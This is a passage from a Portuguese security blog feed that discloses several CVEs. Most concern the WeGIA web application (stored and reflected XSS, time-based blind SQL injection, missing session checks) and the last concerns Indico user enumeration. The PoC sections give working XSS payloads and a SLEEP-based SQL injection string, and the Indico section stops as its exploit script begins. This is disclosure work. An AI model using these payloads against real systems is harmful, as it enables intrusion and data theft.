loading="lazy" /></a> <a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" >Marcelo Queiroz</a></p> <h2 id="colaborador">Colaborador </h2><p><a class="link" href="https://www.linkedin.com/in/nmmorette/" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/natan50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/nmmorette/" target="_blank" rel="noopener" >Natan Maia Morette</a></p> <blockquote> <p><em>By: <a class="link" href="https://github.com/Sec-Dojo-Cyber-House/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></em></p> </blockquote> Wed, 16 Jul 2025 00:00:00 +0000 https://www.cvehunters.com/pt/p/cve-2025-53934/ https://www.cvehunters.com/pt/p/cve-2025-53934/ <h2 id="cve-2025-53934-cross-site-scripting-xss-armazenado-no-endpoint-controlphp-parâmetro-descricao_emergencia">CVE-2025-53934: Cross-Site Scripting (XSS) Armazenado no endpoint <code>control.php</code> parâmetro <code>descricao_emergencia</code> </h2><blockquote> <p><em>Publicação CVE: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-53934" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-53934</a></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">Uma vulnerabilidade de XSS (Cross-Site Scripting Armazenado) foi identificada no endpoint <code>control.php</code> do aplicativo WeGIA. Essa vulnerabilidade permite que invasores injetem scripts maliciosos no parâmetro <code>descricao_emergencia</code>. Os scripts injetados são armazenados no servidor e executados automaticamente sempre que a página afetada é acessada pelos usuários, representando um risco de segurança significativo.</p> <h2 id="detalhes">Detalhes </h2><p>Endpoint Vulnerável: <code>POST /controle/control.php</code></p><h2 id="cve-2025-53934-cross-site-scripting-xss-armazenado-no-endpoint-controlphp-parâmetro-descricao_emergencia">CVE-2025-53934: Cross-Site Scripting (XSS) Armazenado no endpoint <code>control.php</code> parâmetro <code>descricao_emergencia</code> </h2><blockquote> <p><em>Publicação CVE: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-53934" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-53934</a></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">Uma vulnerabilidade de XSS (Cross-Site Scripting Armazenado) foi identificada no endpoint <code>control.php</code> do aplicativo WeGIA. Essa vulnerabilidade permite que invasores injetem scripts maliciosos no parâmetro <code>descricao_emergencia</code>. Os scripts injetados são armazenados no servidor e executados automaticamente sempre que a página afetada é acessada pelos usuários, representando um risco de segurança significativo.</p> <h2 id="detalhes">Detalhes </h2><p>Endpoint Vulnerável: <code>POST /controle/control.php</code></p> <p>Parâmetro: <code>descricao_emergencia</code></p> <p style="text-align: justify;">O aplicativo não consegue validar e sanitizar adequadamente as entradas do usuário no parâmetro <code>descricao_emergencia</code>. Essa falta de validação permite que invasores injetem scripts maliciosos, que são armazenados no servidor. Sempre que a página afetada é acessada, o payload malicioso é executado no navegador da vítima, potencialmente comprometendo os dados e o sistema do usuário.</p> <h2 id="poc">PoC </h2><h3 id="payload">Payload: </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-javascript" data-lang="javascript"><span class="line"><span class="cl"> <span class="o">%</span><span class="mi">22</span><span class="o">%</span><span class="mi">3</span><span class="nx">E</span><span class="o">%</span><span class="mi">3</span><span class="nx">Cimg</span><span class="o">%</span><span class="mi">20</span><span class="nx">src</span><span class="o">=</span><span class="nx">x</span><span class="o">%</span><span class="mi">20</span><span class="nx">onerror</span><span class="o">=</span><span class="nx">alert</span><span class="p">(</span><span class="s1">'XSS-PoC4'</span><span class="p">)</span><span class="o">%</span><span class="mi">3</span><span class="nx">E</span> </span></span></code></pre></td></tr></table> </div> </div><p><img src="/p/cve-2025-53934/image.png" width="663" height="863" srcset="/p/cve-2025-53934/image_hu_e7287864ea99b304.png 480w, /p/cve-2025-53934/image_hu_1028345ab47dc2e9.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="76" data-flex-basis="184px" /></p> <h2 id="impacto">Impacto </h2><p style="text-align: justify;"> <ul> <li>Roubo de cookies de sessão: Invasores podem usar cookies de sessão roubados para sequestrar a sessão de um usuário e executar ações em seu nome.</li> <li>Baixar malware: Invasores podem induzir os usuários a baixar e instalar malware em seus computadores.</li> <li>Sequestro de navegadores: Invasores podem sequestrar o navegador de um usuário ou aplicar exploits baseados nele.</li> <li>Roubo de credenciais: Invasores podem roubar as credenciais de um usuário.</li> <li>Obter informações confidenciais: Invasores podem obter informações confidenciais armazenadas na conta de um usuário ou em seu navegador.</li> <li>Desfigurar sites: Invasores podem desfigurar um site alterando seu conteúdo.</li> <li>Desorientar usuários: Invasores podem alterar as instruções fornecidas aos usuários que visitam o site alvo, desorientando seu comportamento.</li> <li>Prejudicar a reputação de uma empresa: Invasores podem prejudicar a imagem de uma empresa ou espalhar desinformação desfigurando um site corporativo.</li> </ul> </p> <h2 id="referência">Referência </h2><p><a class="link" href="https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-gqwp-637v-v49v" target="_blank" rel="noopener" >https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-gqwp-637v-v49v</a></p> <h2 id="encontrado-por">Encontrado por: </h2><p><a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/marcelo50x50.png" loading="lazy" /></a> <a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" >Marcelo Queiroz</a></p> <h2 id="colaborador">Colaborador </h2><p><a class="link" href="https://www.linkedin.com/in/nmmorette/" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/natan50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/nmmorette/" target="_blank" rel="noopener" >Natan Maia Morette</a></p> <blockquote> <p><em>By: <a class="link" href="https://github.com/Sec-Dojo-Cyber-House/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></em></p> </blockquote> Wed, 16 Jul 2025 00:00:00 +0000 https://www.cvehunters.com/pt/p/cve-2025-53935/ https://www.cvehunters.com/pt/p/cve-2025-53935/ <h2 id="cve-2025-53935-cross-site-scripting-xss-refletido-no-endpoint-personalizacao_selecaophp-parâmetro-id">CVE-2025-53935: Cross-Site Scripting (XSS) Refletido no endpoint <code>personalizacao_selecao.php</code> parâmetro <code>id</code> </h2><blockquote> <p><em>Publicação CVE: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-53935" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-53935</a></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">Uma vulnerabilidade de XSS (Cross-Site Scripting Refletido) foi identificada no endpoint <code>personalizacao_selecao.php</code> do aplicativo WeGia. Essa vulnerabilidade permite que invasores injetem scripts maliciosos no parâmetro <code>id</code>.</p> <h2 id="detalhes">Detalhes </h2><p>Endpoint Vulnerável: <code>POST /html/personalizacao_selecao.php</code></p> <p>Parâmetro: <code>id</code></p> <p style="text-align: justify;">O aplicativo não consegue validar e sanitizar adequadamente as entradas do usuário no parâmetro <code>id</code>. Essa falta de validação permite que invasores injetem scripts maliciosos, que são armazenados no servidor. Sempre que a página afetada é acessada, o payload malicioso é executado no navegador da vítima, potencialmente comprometendo os dados e o sistema do usuário.</p><h2 id="cve-2025-53935-cross-site-scripting-xss-refletido-no-endpoint-personalizacao_selecaophp-parâmetro-id">CVE-2025-53935: Cross-Site Scripting (XSS) Refletido no endpoint <code>personalizacao_selecao.php</code> parâmetro <code>id</code> </h2><blockquote> <p><em>Publicação CVE: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-53935" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-53935</a></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">Uma vulnerabilidade de XSS (Cross-Site Scripting Refletido) foi identificada no endpoint <code>personalizacao_selecao.php</code> do aplicativo WeGia. Essa vulnerabilidade permite que invasores injetem scripts maliciosos no parâmetro <code>id</code>.</p> <h2 id="detalhes">Detalhes </h2><p>Endpoint Vulnerável: <code>POST /html/personalizacao_selecao.php</code></p> <p>Parâmetro: <code>id</code></p> <p style="text-align: justify;">O aplicativo não consegue validar e sanitizar adequadamente as entradas do usuário no parâmetro <code>id</code>. Essa falta de validação permite que invasores injetem scripts maliciosos, que são armazenados no servidor. Sempre que a página afetada é acessada, o payload malicioso é executado no navegador da vítima, potencialmente comprometendo os dados e o sistema do usuário.</p> <h2 id="poc">PoC </h2><h3 id="payload">Payload: </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-javascript" data-lang="javascript"><span class="line"><span class="cl"> <span class="err">"</span><span class="o">><</span><span class="nx">img</span> <span class="nx">src</span><span class="o">=</span><span class="nx">x</span> <span class="nx">onerror</span><span class="o">=</span><span class="nx">alert</span><span class="p">(</span><span class="s1">'XSS-PoC3'</span><span class="p">)</span><span class="o">></span> </span></span></code></pre></td></tr></table> </div> </div><p><img src="/p/cve-2025-53935/image.png" width="706" height="853" srcset="/p/cve-2025-53935/image_hu_465e3ff624cdf11d.png 480w, /p/cve-2025-53935/image_hu_8c5a3f2d6253bfd4.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="82" data-flex-basis="198px" /></p> <h2 id="impacto">Impacto </h2><p style="text-align: justify;"> <ul> <li>Roubo de cookies de sessão: Invasores podem usar cookies de sessão roubados para sequestrar a sessão de um usuário e executar ações em seu nome.</li> <li>Baixar malware: Invasores podem induzir os usuários a baixar e instalar malware em seus computadores.</li> <li>Sequestro de navegadores: Invasores podem sequestrar o navegador de um usuário ou aplicar exploits baseados nele.</li> <li>Roubo de credenciais: Invasores podem roubar as credenciais de um usuário.</li> <li>Obter informações confidenciais: Invasores podem obter informações confidenciais armazenadas na conta de um usuário ou em seu navegador.</li> <li>Desfigurar sites: Invasores podem desfigurar um site alterando seu conteúdo.</li> <li>Desorientar usuários: Invasores podem alterar as instruções fornecidas aos usuários que visitam o site alvo, desorientando seu comportamento.</li> <li>Prejudicar a reputação de uma empresa: Invasores podem prejudicar a imagem de uma empresa ou espalhar desinformação desfigurando um site corporativo.</li> </ul> </p> <h2 id="referência">Referência </h2><p><a class="link" href="https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-5x6v-h459-xjqh" target="_blank" rel="noopener" >https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-5x6v-h459-xjqh</a></p> <h2 id="encontrado-por">Encontrado por: </h2><p><a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/marcelo50x50.png" loading="lazy" /></a> <a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" >Marcelo Queiroz</a></p> <h2 id="colaborador">Colaborador </h2><p><a class="link" href="https://www.linkedin.com/in/nmmorette/" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/natan50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/nmmorette/" target="_blank" rel="noopener" >Natan Maia Morette</a></p> <blockquote> <p><em>By: <a class="link" href="https://github.com/Sec-Dojo-Cyber-House/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></em></p> </blockquote> Wed, 16 Jul 2025 00:00:00 +0000 https://www.cvehunters.com/pt/p/cve-2025-53936/ https://www.cvehunters.com/pt/p/cve-2025-53936/ <h2 id="cve-2025-53936-cross-site-scripting-xss-refletido-no-endpoint-personalizacao_selecaophp-parâmetro-nome_car">CVE-2025-53936: Cross-Site Scripting (XSS) Refletido no endpoint <code>personalizacao_selecao.php</code> parâmetro <code>nome_car</code> </h2><blockquote> <p><em>Publicação CVE: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-53936" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-53936</a></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">Uma vulnerabilidade de XSS (Cross-Site Scripting Refletido) foi identificada no endpoint <code>personalizacao_selecao.php</code> do aplicativo WeGia. Essa vulnerabilidade permite que invasores injetem scripts maliciosos no parâmetro <code>nome_car</code>.</p> <h2 id="detalhes">Detalhes </h2><p>Endpoint Vulnerável: <code>POST /html/personalizacao_selecao.php</code></p> <p>Parâmetro: <code>nome_car</code></p> <p style="text-align: justify;">O aplicativo não consegue validar e sanitizar adequadamente as entradas do usuário no parâmetro <code>nome_car</code>. Essa falta de validação permite que invasores injetem scripts maliciosos, que são armazenados no servidor. Sempre que a página afetada é acessada, o payload malicioso é executado no navegador da vítima, potencialmente comprometendo os dados e o sistema do usuário.</p><h2 id="cve-2025-53936-cross-site-scripting-xss-refletido-no-endpoint-personalizacao_selecaophp-parâmetro-nome_car">CVE-2025-53936: Cross-Site Scripting (XSS) Refletido no endpoint <code>personalizacao_selecao.php</code> parâmetro <code>nome_car</code> </h2><blockquote> <p><em>Publicação CVE: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-53936" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-53936</a></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">Uma vulnerabilidade de XSS (Cross-Site Scripting Refletido) foi identificada no endpoint <code>personalizacao_selecao.php</code> do aplicativo WeGia. Essa vulnerabilidade permite que invasores injetem scripts maliciosos no parâmetro <code>nome_car</code>.</p> <h2 id="detalhes">Detalhes </h2><p>Endpoint Vulnerável: <code>POST /html/personalizacao_selecao.php</code></p> <p>Parâmetro: <code>nome_car</code></p> <p style="text-align: justify;">O aplicativo não consegue validar e sanitizar adequadamente as entradas do usuário no parâmetro <code>nome_car</code>. Essa falta de validação permite que invasores injetem scripts maliciosos, que são armazenados no servidor. Sempre que a página afetada é acessada, o payload malicioso é executado no navegador da vítima, potencialmente comprometendo os dados e o sistema do usuário.</p> <h2 id="poc">PoC </h2><h3 id="payload">Payload: </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-javascript" data-lang="javascript"><span class="line"><span class="cl"> <span class="err">"</span><span class="o">><</span><span class="nx">img</span> <span class="nx">src</span><span class="o">=</span><span class="nx">x</span> <span class="nx">onerror</span><span class="o">=</span><span class="nx">alert</span><span class="p">(</span><span class="s1">'XSS-PoC5'</span><span class="p">)</span><span class="o">></span> </span></span></code></pre></td></tr></table> </div> </div><p><img src="/p/cve-2025-53936/image.png" width="713" height="856" srcset="/p/cve-2025-53936/image_hu_b5a24124f1a5f7aa.png 480w, /p/cve-2025-53936/image_hu_c19d2cd3d802d084.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="83" data-flex-basis="199px" /></p> <h2 id="impacto">Impacto </h2><p style="text-align: justify;"> <ul> <li>Roubo de cookies de sessão: Invasores podem usar cookies de sessão roubados para sequestrar a sessão de um usuário e executar ações em seu nome.</li> <li>Baixar malware: Invasores podem induzir os usuários a baixar e instalar malware em seus computadores.</li> <li>Sequestro de navegadores: Invasores podem sequestrar o navegador de um usuário ou aplicar exploits baseados nele.</li> <li>Roubo de credenciais: Invasores podem roubar as credenciais de um usuário.</li> <li>Obter informações confidenciais: Invasores podem obter informações confidenciais armazenadas na conta de um usuário ou em seu navegador.</li> <li>Desfigurar sites: Invasores podem desfigurar um site alterando seu conteúdo.</li> <li>Desorientar usuários: Invasores podem alterar as instruções fornecidas aos usuários que visitam o site alvo, desorientando seu comportamento.</li> <li>Prejudicar a reputação de uma empresa: Invasores podem prejudicar a imagem de uma empresa ou espalhar desinformação desfigurando um site corporativo.</li> </ul> </p> <h2 id="referência">Referência </h2><p><a class="link" href="https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-34vc-q923-v26p" target="_blank" rel="noopener" >https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-34vc-q923-v26p</a></p> <h2 id="encontrado-por">Encontrado por: </h2><p><a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/marcelo50x50.png" loading="lazy" /></a> <a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" >Marcelo Queiroz</a></p> <h2 id="colaborador">Colaborador </h2><p><a class="link" href="https://www.linkedin.com/in/nmmorette/" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/natan50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/nmmorette/" target="_blank" rel="noopener" >Natan Maia Morette</a></p> <blockquote> <p><em>By: <a class="link" href="https://github.com/Sec-Dojo-Cyber-House/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></em></p> </blockquote> Wed, 16 Jul 2025 00:00:00 +0000 https://www.cvehunters.com/pt/p/cve-2025-53937/ https://www.cvehunters.com/pt/p/cve-2025-53937/ <h2 id="cve-2025-53937-vulnerabilidade-de-injeção-sql-blind-time-based-no-parâmetro-cargo-do-endpoint-controlphp">CVE-2025-53937: Vulnerabilidade de Injeção SQL (Blind Time-Based) no parâmetro <code>cargo</code> do Endpoint <code>control.php</code> </h2><blockquote> <p><em>Publicação CVE: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-53937" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-53937</a></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">Uma vulnerabilidade de injeção SQL foi descoberta no parâmetro <code>cargo</code> do endpoint <code>/controle/control.php</code>. Esse problema permite que qualquer invasor não autenticado injete consultas SQL arbitrárias, potencialmente levando a acesso não autorizado aos dados ou exploração adicional, dependendo da configuração do banco de dados.</p> <h2 id="detalhes">Detalhes </h2><p style="text-align: justify;">O aplicativo não consegue sanitizar adequadamente a entrada fornecida pelo usuário no parâmetro almox. Como resultado, payloads SQL especialmente criados são interpretados diretamente pelo banco de dados de back-end.</p><h2 id="cve-2025-53937-vulnerabilidade-de-injeção-sql-blind-time-based-no-parâmetro-cargo-do-endpoint-controlphp">CVE-2025-53937: Vulnerabilidade de Injeção SQL (Blind Time-Based) no parâmetro <code>cargo</code> do Endpoint <code>control.php</code> </h2><blockquote> <p><em>Publicação CVE: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-53937" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-53937</a></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">Uma vulnerabilidade de injeção SQL foi descoberta no parâmetro <code>cargo</code> do endpoint <code>/controle/control.php</code>. Esse problema permite que qualquer invasor não autenticado injete consultas SQL arbitrárias, potencialmente levando a acesso não autorizado aos dados ou exploração adicional, dependendo da configuração do banco de dados.</p> <h2 id="detalhes">Detalhes </h2><p style="text-align: justify;">O aplicativo não consegue sanitizar adequadamente a entrada fornecida pelo usuário no parâmetro almox. Como resultado, payloads SQL especialmente criados são interpretados diretamente pelo banco de dados de back-end.</p> <h2 id="poc">PoC </h2><p>Endpoint Vulnerável: <code>/controle/control.php</code></p> <p>Parâmetro: <code>cargo</code></p> <h3 id="payload">Payload: </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">' AND (SELECT 4207 FROM (SELECT(SLEEP(10)))bAsK) AND 'LOon'='LOon </span></span></code></pre></td></tr></table> </div> </div><p style="text-align: justify;">Este payload introduz um atraso de tempo, demonstrando a capacidade de executar consultas SQL arbitrárias.</p> <p><img src="/p/cve-2025-53937/image.png" width="915" height="924" srcset="/p/cve-2025-53937/image_hu_627764b08a014a29.png 480w, /p/cve-2025-53937/image_hu_9595da3164b60890.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="99" data-flex-basis="237px" /></p> <p style="text-align: justify;">Observe o atraso de tempo na resposta do servidor, indicando a execução bem-sucedida da carga útil SQL.</p> <h2 id="impacto">Impacto </h2><p style="text-align: justify;"> <ul> <li>Acesso não autorizado a dados confidenciais (por exemplo, usuários, senhas, registros).</li> <li>Enumeração de banco de dados (esquemas, tabelas, usuários, versões).</li> <li>Escalonamento para RCE dependendo da configuração do banco de dados (por exemplo, xp_cmdshell, UDFs).</li> <li>Comprometimento total do aplicativo se encadeado com outras vulnerabilidades.</li> <li>Esse problema afeta todos os usuários e ambientes, pois não requer autenticação e pode ser acessado por meio de um ponto de extremidade público.</li> </ul> </p> <h2 id="referência">Referência </h2><p><a class="link" href="https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-j3qv-v3m7-73pj" target="_blank" rel="noopener" >https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-j3qv-v3m7-73pj</a></p> <h2 id="encontrado-por">Encontrado por </h2><p><a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/marcelo50x50.png" loading="lazy" /></a> <a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" >Marcelo Queiroz</a></p> <h2 id="colaborador">Colaborador </h2><p><a class="link" href="https://www.linkedin.com/in/nmmorette" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/natan50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/nmmorette" target="_blank" rel="noopener" >Natan Maia Morette</a></p> <blockquote> <p><em>By: <a class="link" href="https://github.com/Sec-Dojo-Cyber-House/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></em></p> </blockquote> Wed, 16 Jul 2025 00:00:00 +0000 https://www.cvehunters.com/pt/p/cve-2025-53938/ https://www.cvehunters.com/pt/p/cve-2025-53938/ <h2 id="cve-2025-53938-bypass-de-autenticação-devido-à-ausência-de-validação-de-sessão-em-múltiplos-endpoints">CVE-2025-53938: Bypass de Autenticação devido à Ausência de Validação de Sessão em Múltiplos Endpoints </h2><blockquote> <p><em>Publicação CVE: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-53938" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-53938</a></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">Uma vulnerabilidade de <b>Bypass de Autenticação</b> foi identificado no endpoint <code>/dao/verificar_recursos_cargo.php</code> da aplicação WeGia. Esta vulnerabilidade permite que <b>usuários não autenticados</b> acessem funcionalidades protegidas do aplicativo e recuperem informações confidenciais enviando solicitações HTTP criadas <b>sem cookies de sessão ou tokens de autenticação</b>.</p> <h2 id="detalhes">Detalhes </h2><h3 id="endpoints-vulneráveis">Endpoints Vulneráveis: </h3><p style="text-align: justify;"> <ul> <li><code>/dao/verificar_recursos_cargo.php</code></li> <li><code>/dao/exibir_cargo.php</code></li> <li><code>/dao/verificar_modulos_visiveis.php</code></li> <li><code>/dao/exibir_documento.php</code></li> <li><code>/dao/adicionar_documento.php</code></li> </ul> </p><h2 id="cve-2025-53938-bypass-de-autenticação-devido-à-ausência-de-validação-de-sessão-em-múltiplos-endpoints">CVE-2025-53938: Bypass de Autenticação devido à Ausência de Validação de Sessão em Múltiplos Endpoints </h2><blockquote> <p><em>Publicação CVE: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-53938" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-53938</a></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">Uma vulnerabilidade de <b>Bypass de Autenticação</b> foi identificado no endpoint <code>/dao/verificar_recursos_cargo.php</code> da aplicação WeGia. Esta vulnerabilidade permite que <b>usuários não autenticados</b> acessem funcionalidades protegidas do aplicativo e recuperem informações confidenciais enviando solicitações HTTP criadas <b>sem cookies de sessão ou tokens de autenticação</b>.</p> <h2 id="detalhes">Detalhes </h2><h3 id="endpoints-vulneráveis">Endpoints Vulneráveis: </h3><p style="text-align: justify;"> <ul> <li><code>/dao/verificar_recursos_cargo.php</code></li> <li><code>/dao/exibir_cargo.php</code></li> <li><code>/dao/verificar_modulos_visiveis.php</code></li> <li><code>/dao/exibir_documento.php</code></li> <li><code>/dao/adicionar_documento.php</code></li> </ul> </p> <h3 id="autenticação-necessária">Autenticação Necessária: </h3><ul> <li>❌ Não</li> </ul> <h2 id="poc">PoC </h2><p><img src="/p/cve-2025-53938/image.png" width="1058" height="749" srcset="/p/cve-2025-53938/image_hu_e3306e3cf65cbbc2.png 480w, /p/cve-2025-53938/image_hu_50392cb7cd1239e4.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="141" data-flex-basis="339px" /></p> <h2 id="impacto">Impacto </h2><p style="text-align: justify;">A falta de validação de sessão neste endpoint pode levar a vários riscos de segurança:</p> <p style="text-align: justify;"> <ul> <li><b>Exposição de Dados Não Autorizada:</b> Usuários não autenticados podem enumerar ou recuperar dados internos confidenciais.</li> <li><b>Escalonamento de Privilégios:</b> Invasores podem acessar ou inferir informações destinadas apenas a usuários autorizados.</li> <li><b>Divulgação de Informações:</b> Lógica de negócios e IDs internos (como funções ou permissões de usuário) podem ser vazados.</li> <li><b>Suporte de Reconhecimento:</b> Facilita o mapeamento de estruturas de backend para ataques mais direcionados.</li> </ul> </p> <h2 id="referência">Referência </h2><p><a class="link" href="https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-6p76-7mm4-j5rj" target="_blank" rel="noopener" >https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-6p76-7mm4-j5rj</a></p> <h2 id="encontrado-por">Encontrado por: </h2><p><a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/marcelo50x50.png" loading="lazy" /></a> <a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" >Marcelo Queiroz</a></p> <h2 id="colaborador">Colaborador </h2><p><a class="link" href="https://www.linkedin.com/in/nmmorette/" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/natan50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/nmmorette/" target="_blank" rel="noopener" >Natan Maia Morette</a></p> <blockquote> <p><em>Por: <a class="link" href="https://github.com/Sec-Dojo-Cyber-House/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></em></p> </blockquote> Wed, 16 Jul 2025 00:00:00 +0000 https://www.cvehunters.com/pt/p/cve-2025-53640/ https://www.cvehunters.com/pt/p/cve-2025-53640/ <h2 id="cve-2025-53640-enumeração-de-usuários-via-endpoint-de-api">CVE-2025-53640: Enumeração de usuários via endpoint de API </h2><blockquote> <p><em><strong>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-53640" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-53640</a></strong></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">Uma vulnerabilidade de Broken Object Level Authorization (BOLA) no Indico permite a enumeração de usuários autenticados por meio do Endpoint<code>/api/principals</code>, expondo nomes, e-mails e afiliações. Inclui script de exploração, análise de requisições e capturas de tela. Afeta instâncias do Indico implantadas globalmente (Organização Europeia para Pesquisa Nuclear (CERN), Nações Unidas (ONU), Instituto de Tecnologia de Massachusetts (MIT), Agência Espacial Europeia (ESA), entre outras).</p><h2 id="cve-2025-53640-enumeração-de-usuários-via-endpoint-de-api">CVE-2025-53640: Enumeração de usuários via endpoint de API </h2><blockquote> <p><em><strong>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-53640" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-53640</a></strong></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">Uma vulnerabilidade de Broken Object Level Authorization (BOLA) no Indico permite a enumeração de usuários autenticados por meio do Endpoint<code>/api/principals</code>, expondo nomes, e-mails e afiliações. Inclui script de exploração, análise de requisições e capturas de tela. Afeta instâncias do Indico implantadas globalmente (Organização Europeia para Pesquisa Nuclear (CERN), Nações Unidas (ONU), Instituto de Tecnologia de Massachusetts (MIT), Agência Espacial Europeia (ESA), entre outras).</p> <h2 id="detalhes">Detalhes </h2><p style="text-align: justify;">Uma vulnerabilidade de Broken Object Level Authorization (BOLA) no aplicativo de código aberto Indico permite a enumeração em massa de usuários por meio do endpoint <code>/api/principals</code>.<br /><br />Originalmente projetado para resolver IDs de usuários em campos específicos de formulário, este endpoint pode ser usado indevidamente para recuperar detalhes pessoais de <b>qualquer ID de usuário válido:</b><br /> <ul><li>Nome completo</li> <li>Endereço de e-mail</li> <li>Cargo</li> <li>Afiliação</li> <li>URL do Avatar</li> </ul> </p> <h2 id="requisitos-de-exploração">Requisitos de Exploração </h2><p style="text-align: justify;"> <ul><li>Um ID de usuário válido É necessária uma sessão autenticada.</li> <li>No entanto, a maioria das instâncias públicas do Indico permite o autorregistro sem verificação de e-mail, CAPTCHA ou aprovação manual.</li> <li>Isso torna a vulnerabilidade <b>praticamente explorável por usuários não autenticados</b> após a criação de uma conta simples.</li> </ul> </p> <h2 id="poc">PoC </h2><h3 id="exploit">Exploit </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> 